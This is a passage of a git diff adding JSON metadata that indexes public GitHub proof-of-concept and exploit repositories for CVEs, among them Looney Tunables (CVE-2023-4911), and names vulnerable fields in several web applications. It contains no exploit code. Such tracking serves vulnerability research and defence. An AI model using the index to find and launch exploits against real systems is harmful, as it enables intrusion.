+ "html_url": "https:\/\/github.com\/hadrian3689\/looney-tunables-CVE-2023-4911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-10T22:04:23Z",
+ "updated_at": "2024-06-12T20:36:29Z",
+ "pushed_at": "2023-10-15T19:37:06Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 703602936,
+ "name": "CVE-2023-4911",
+ "full_name": "ruycr4ft\/CVE-2023-4911",
+ "owner": {
+ "login": "ruycr4ft",
+ "id": 103446004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103446004?v=4",
+ "html_url": "https:\/\/github.com\/ruycr4ft"
+ },
+ "html_url": "https:\/\/github.com\/ruycr4ft\/CVE-2023-4911",
+ "description": "CVE-2023-4911",
+ "fork": false,
+ "created_at": "2023-10-11T14:49:22Z",
+ "updated_at": "2024-06-17T02:18:05Z",
+ "pushed_at": "2023-10-11T15:15:18Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-4911",
+ "linux-privilege-escalation",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704757696,
+ "name": "CVE-2023-4911",
+ "full_name": "guffre\/CVE-2023-4911",
+ "owner": {
+ "login": "guffre",
+ "id": 21281361,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21281361?v=4",
+ "html_url": "https:\/\/github.com\/guffre"
+ },
+ "html_url": "https:\/\/github.com\/guffre\/CVE-2023-4911",
+ "description": "PoC for CVE-2023-4911 LooneyTuneables",
+ "fork": false,
+ "created_at": "2023-10-14T02:24:52Z",
+ "updated_at": "2023-10-14T02:25:44Z",
+ "pushed_at": "2023-12-09T22:49:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706044499,
+ "name": "LooneyPwner",
+ "full_name": "chaudharyarjun\/LooneyPwner",
+ "owner": {
+ "login": "chaudharyarjun",
+ "id": 66072013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66072013?v=4",
+ "html_url": "https:\/\/github.com\/chaudharyarjun"
+ },
+ "html_url": "https:\/\/github.com\/chaudharyarjun\/LooneyPwner",
+ "description": "Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.",
+ "fork": false,
+ "created_at": "2023-10-17T07:44:16Z",
+ "updated_at": "2024-05-15T06:21:54Z",
+ "pushed_at": "2023-10-18T04:59:50Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 709787729,
+ "name": "CVE-2023-4911",
+ "full_name": "KernelKrise\/CVE-2023-4911",
+ "owner": {
+ "login": "KernelKrise",
+ "id": 76210733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76210733?v=4",
+ "html_url": "https:\/\/github.com\/KernelKrise"
+ },
+ "html_url": "https:\/\/github.com\/KernelKrise\/CVE-2023-4911",
+ "description": "Looney Tunables Local privilege escalation (CVE-2023-4911) workshop",
+ "fork": false,
+ "created_at": "2023-10-25T11:59:34Z",
+ "updated_at": "2024-06-23T16:46:36Z",
+ "pushed_at": "2023-10-25T12:37:38Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711297984,
+ "name": "CVE-2023-4911",
+ "full_name": "Diego-AltF4\/CVE-2023-4911",
+ "owner": {
+ "login": "Diego-AltF4",
+ "id": 55554183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55554183?v=4",
+ "html_url": "https:\/\/github.com\/Diego-AltF4"
+ },
+ "html_url": "https:\/\/github.com\/Diego-AltF4\/CVE-2023-4911",
+ "description": "Proof of concept for CVE-2023-4911 (Looney Tunables) discovered by Qualys Threat Research Unit ",
+ "fork": false,
+ "created_at": "2023-10-28T20:05:30Z",
+ "updated_at": "2024-01-02T12:58:55Z",
+ "pushed_at": "2023-10-29T16:47:55Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 716007417,
+ "name": "looneyCVE",
+ "full_name": "teraGL\/looneyCVE",
+ "owner": {
+ "login": "teraGL",
+ "id": 35891879,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35891879?v=4",
+ "html_url": "https:\/\/github.com\/teraGL"
+ },
+ "html_url": "https:\/\/github.com\/teraGL\/looneyCVE",
+ "description": "Looney Tunables CVE-2023-4911",
+ "fork": false,
+ "created_at": "2023-11-08T09:34:04Z",
+ "updated_at": "2023-11-13T08:09:54Z",
+ "pushed_at": "2023-11-13T14:59:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 729907332,
+ "name": "Looney-Tunables",
+ "full_name": "snurkeburk\/Looney-Tunables",
+ "owner": {
+ "login": "snurkeburk",
+ "id": 70603096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70603096?v=4",
+ "html_url": "https:\/\/github.com\/snurkeburk"
+ },
+ "html_url": "https:\/\/github.com\/snurkeburk\/Looney-Tunables",
+ "description": "PoC of CVE-2023-4911",
+ "fork": false,
+ "created_at": "2023-12-10T18:05:27Z",
+ "updated_at": "2023-12-10T18:14:12Z",
+ "pushed_at": "2023-12-10T19:28:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735025193,
+ "name": "CVE-2023-4911",
+ "full_name": "puckiestyle\/CVE-2023-4911",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-4911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-23T11:54:40Z",
+ "updated_at": "2023-12-23T11:54:52Z",
+ "pushed_at": "2023-12-23T11:54:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745620836,
+ "name": "Looney-Tunables-CVE-2023-4911",
+ "full_name": "yanfernandess\/Looney-Tunables-CVE-2023-4911",
+ "owner": {
+ "login": "yanfernandess",
+ "id": 100174458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100174458?v=4",
+ "html_url": "https:\/\/github.com\/yanfernandess"
+ },
+ "html_url": "https:\/\/github.com\/yanfernandess\/Looney-Tunables-CVE-2023-4911",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T18:20:05Z",
+ "updated_at": "2024-01-22T19:50:29Z",
+ "pushed_at": "2024-01-19T18:44:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745988276,
+ "name": "CVE-2023-4911-PoC",
+ "full_name": "NishanthAnand21\/CVE-2023-4911-PoC",
+ "owner": {
+ "login": "NishanthAnand21",
+ "id": 87749392,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87749392?v=4",
+ "html_url": "https:\/\/github.com\/NishanthAnand21"
+ },
+ "html_url": "https:\/\/github.com\/NishanthAnand21\/CVE-2023-4911-PoC",
+ "description": "Repository containing a Proof of Concept (PoC) demonstrating the impact of CVE-2023-4911, a vulnerability in glibc's ld.so dynamic loader, exposing risks related to Looney Tunables. ",
+ "fork": false,
+ "created_at": "2024-01-20T18:47:07Z",
+ "updated_at": "2024-02-03T04:50:28Z",
+ "pushed_at": "2024-01-20T20:45:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49313.json b/2023/CVE-2023-49313.json
new file mode 100644
index 0000000000..2bdf804f5b
--- /dev/null
+++ b/2023/CVE-2023-49313.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724369843,
+ "name": "CVE-2023-49313",
+ "full_name": "louiselalanne\/CVE-2023-49313",
+ "owner": {
+ "login": "louiselalanne",
+ "id": 100588945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4",
+ "html_url": "https:\/\/github.com\/louiselalanne"
+ },
+ "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49313",
+ "description": "A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.",
+ "fork": false,
+ "created_at": "2023-11-27T23:59:35Z",
+ "updated_at": "2023-12-07T01:21:35Z",
+ "pushed_at": "2023-11-28T12:59:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49314.json b/2023/CVE-2023-49314.json
new file mode 100644
index 0000000000..3d214f8577
--- /dev/null
+++ b/2023/CVE-2023-49314.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724563642,
+ "name": "CVE-2023-49314",
+ "full_name": "louiselalanne\/CVE-2023-49314",
+ "owner": {
+ "login": "louiselalanne",
+ "id": 100588945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4",
+ "html_url": "https:\/\/github.com\/louiselalanne"
+ },
+ "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49314",
+ "description": "Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and enableNodeCliInspectArguments, and thus r3ggi\/electroniz3r can be used to perform an attack.",
+ "fork": false,
+ "created_at": "2023-11-28T10:39:19Z",
+ "updated_at": "2024-05-06T04:13:03Z",
+ "pushed_at": "2023-11-28T11:48:48Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49339.json b/2023/CVE-2023-49339.json
new file mode 100644
index 0000000000..aca65d2d14
--- /dev/null
+++ b/2023/CVE-2023-49339.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744744997,
+ "name": "CVE-2023-49339",
+ "full_name": "3zizme\/CVE-2023-49339",
+ "owner": {
+ "login": "3zizme",
+ "id": 75446753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75446753?v=4",
+ "html_url": "https:\/\/github.com\/3zizme"
+ },
+ "html_url": "https:\/\/github.com\/3zizme\/CVE-2023-49339",
+ "description": "Critical Security Vulnerability in Ellucian Banner System",
+ "fork": false,
+ "created_at": "2024-01-17T23:18:29Z",
+ "updated_at": "2024-04-11T18:26:35Z",
+ "pushed_at": "2024-01-17T23:20:44Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49438.json b/2023/CVE-2023-49438.json
new file mode 100644
index 0000000000..48ccdaa938
--- /dev/null
+++ b/2023/CVE-2023-49438.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731811886,
+ "name": "CVE-2023-49438",
+ "full_name": "brandon-t-elliott\/CVE-2023-49438",
+ "owner": {
+ "login": "brandon-t-elliott",
+ "id": 126433368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4",
+ "html_url": "https:\/\/github.com\/brandon-t-elliott"
+ },
+ "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2023-49438",
+ "description": "CVE-2023-49438 - Open Redirect Vulnerability in Flask-Security-Too",
+ "fork": false,
+ "created_at": "2023-12-14T23:58:42Z",
+ "updated_at": "2024-01-09T20:23:44Z",
+ "pushed_at": "2023-12-30T02:02:19Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49453.json b/2023/CVE-2023-49453.json
new file mode 100644
index 0000000000..34d0fa06d4
--- /dev/null
+++ b/2023/CVE-2023-49453.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 769446859,
+ "name": "CVE-2023-49453",
+ "full_name": "nitipoom-jar\/CVE-2023-49453",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-49453",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-09T05:15:02Z",
+ "updated_at": "2024-03-09T05:15:36Z",
+ "pushed_at": "2024-03-09T05:19:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49471.json b/2023/CVE-2023-49471.json
new file mode 100644
index 0000000000..651de5590a
--- /dev/null
+++ b/2023/CVE-2023-49471.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 735350717,
+ "name": "CVE-2023-49471",
+ "full_name": "zunak\/CVE-2023-49471",
+ "owner": {
+ "login": "zunak",
+ "id": 14941490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4",
+ "html_url": "https:\/\/github.com\/zunak"
+ },
+ "html_url": "https:\/\/github.com\/zunak\/CVE-2023-49471",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-24T15:40:24Z",
+ "updated_at": "2023-12-24T15:42:33Z",
+ "pushed_at": "2023-12-24T15:44:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49496.json b/2023/CVE-2023-49496.json
new file mode 100644
index 0000000000..01495c0fb2
--- /dev/null
+++ b/2023/CVE-2023-49496.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 760186862,
+ "name": "CVE-2023-49496",
+ "full_name": "HuangYanQwQ\/CVE-2023-49496",
+ "owner": {
+ "login": "HuangYanQwQ",
+ "id": 155517523,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155517523?v=4",
+ "html_url": "https:\/\/github.com\/HuangYanQwQ"
+ },
+ "html_url": "https:\/\/github.com\/HuangYanQwQ\/CVE-2023-49496",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-20T00:11:52Z",
+ "updated_at": "2024-02-20T00:11:52Z",
+ "pushed_at": "2024-02-20T00:11:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49539.json b/2023/CVE-2023-49539.json
new file mode 100644
index 0000000000..39108b1e27
--- /dev/null
+++ b/2023/CVE-2023-49539.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733656217,
+ "name": "CVE-2023-49539",
+ "full_name": "geraldoalcantara\/CVE-2023-49539",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49539",
+ "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \"index.php\/category\" - vulnerable field: \"Category Name\"",
+ "fork": false,
+ "created_at": "2023-12-19T20:31:36Z",
+ "updated_at": "2023-12-20T09:41:30Z",
+ "pushed_at": "2023-12-20T07:56:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49540.json b/2023/CVE-2023-49540.json
new file mode 100644
index 0000000000..ceed7d7ffa
--- /dev/null
+++ b/2023/CVE-2023-49540.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733661228,
+ "name": "CVE-2023-49540",
+ "full_name": "geraldoalcantara\/CVE-2023-49540",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49540",
+ "description": "Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in \/index.php\/history - vulnerable field: \"Customer's Name\".",
+ "fork": false,
+ "created_at": "2023-12-19T20:50:09Z",
+ "updated_at": "2023-12-20T09:42:07Z",
+ "pushed_at": "2023-12-20T08:08:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49543.json b/2023/CVE-2023-49543.json
new file mode 100644
index 0000000000..5d56c15eb1
--- /dev/null
+++ b/2023/CVE-2023-49543.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733666604,
+ "name": "CVE-2023-49543",
+ "full_name": "geraldoalcantara\/CVE-2023-49543",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49543",
+ "description": "Book Store Management System v1.0 - Incorrect Access Control ",
+ "fork": false,
+ "created_at": "2023-12-19T21:10:14Z",
+ "updated_at": "2023-12-20T09:43:06Z",
+ "pushed_at": "2023-12-19T21:24:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49544.json b/2023/CVE-2023-49544.json
new file mode 100644
index 0000000000..a987bf3ab6
--- /dev/null
+++ b/2023/CVE-2023-49544.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724470555,
+ "name": "CVE-2023-49544",
+ "full_name": "geraldoalcantara\/CVE-2023-49544",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49544",
+ "description": "Customer Support System 1.0 - Local File Inclusion",
+ "fork": false,
+ "created_at": "2023-11-28T06:21:51Z",
+ "updated_at": "2023-12-20T09:43:54Z",
+ "pushed_at": "2023-12-19T20:29:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49545.json b/2023/CVE-2023-49545.json
new file mode 100644
index 0000000000..8d864d34e4
--- /dev/null
+++ b/2023/CVE-2023-49545.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724455925,
+ "name": "CVE-2023-49545",
+ "full_name": "geraldoalcantara\/CVE-2023-49545",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49545",
+ "description": "Customer Support System 1.0 - Directory Listing",
+ "fork": false,
+ "created_at": "2023-11-28T05:33:06Z",
+ "updated_at": "2023-12-20T09:45:15Z",
+ "pushed_at": "2023-12-19T21:52:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49546.json b/2023/CVE-2023-49546.json
new file mode 100644
index 0000000000..625069a422
--- /dev/null
+++ b/2023/CVE-2023-49546.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733677633,
+ "name": "CVE-2023-49546",
+ "full_name": "geraldoalcantara\/CVE-2023-49546",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49546",
+ "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"email\" Parameter During \"save_staff\" Operation",
+ "fork": false,
+ "created_at": "2023-12-19T21:54:36Z",
+ "updated_at": "2023-12-20T09:46:02Z",
+ "pushed_at": "2023-12-20T08:22:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49547.json b/2023/CVE-2023-49547.json
new file mode 100644
index 0000000000..127e40e750
--- /dev/null
+++ b/2023/CVE-2023-49547.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724618079,
+ "name": "CVE-2023-49547",
+ "full_name": "geraldoalcantara\/CVE-2023-49547",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49547",
+ "description": "Customer Support System 1.0 - SQL Injection Login Bypass",
+ "fork": false,
+ "created_at": "2023-11-28T12:59:10Z",
+ "updated_at": "2023-12-20T09:47:00Z",
+ "pushed_at": "2023-12-19T22:26:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49548.json b/2023/CVE-2023-49548.json
new file mode 100644
index 0000000000..bca555cac7
--- /dev/null
+++ b/2023/CVE-2023-49548.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733685667,
+ "name": "CVE-2023-49548",
+ "full_name": "geraldoalcantara\/CVE-2023-49548",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49548",
+ "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"lastname\" Parameter During \"save_user\" Operation",
+ "fork": false,
+ "created_at": "2023-12-19T22:27:24Z",
+ "updated_at": "2023-12-20T09:47:44Z",
+ "pushed_at": "2023-12-20T08:27:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49606.json b/2023/CVE-2023-49606.json
new file mode 100644
index 0000000000..436109b4ff
--- /dev/null
+++ b/2023/CVE-2023-49606.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 797160207,
+ "name": "CVE-2023-49606",
+ "full_name": "d0rb\/CVE-2023-49606",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-49606",
+ "description": "Critical use-after-free vulnerability discovered in Tinyproxy",
+ "fork": false,
+ "created_at": "2024-05-07T10:03:01Z",
+ "updated_at": "2024-05-10T08:01:36Z",
+ "pushed_at": "2024-05-07T10:11:53Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4966.json b/2023/CVE-2023-4966.json
new file mode 100644
index 0000000000..d10b865539
--- /dev/null
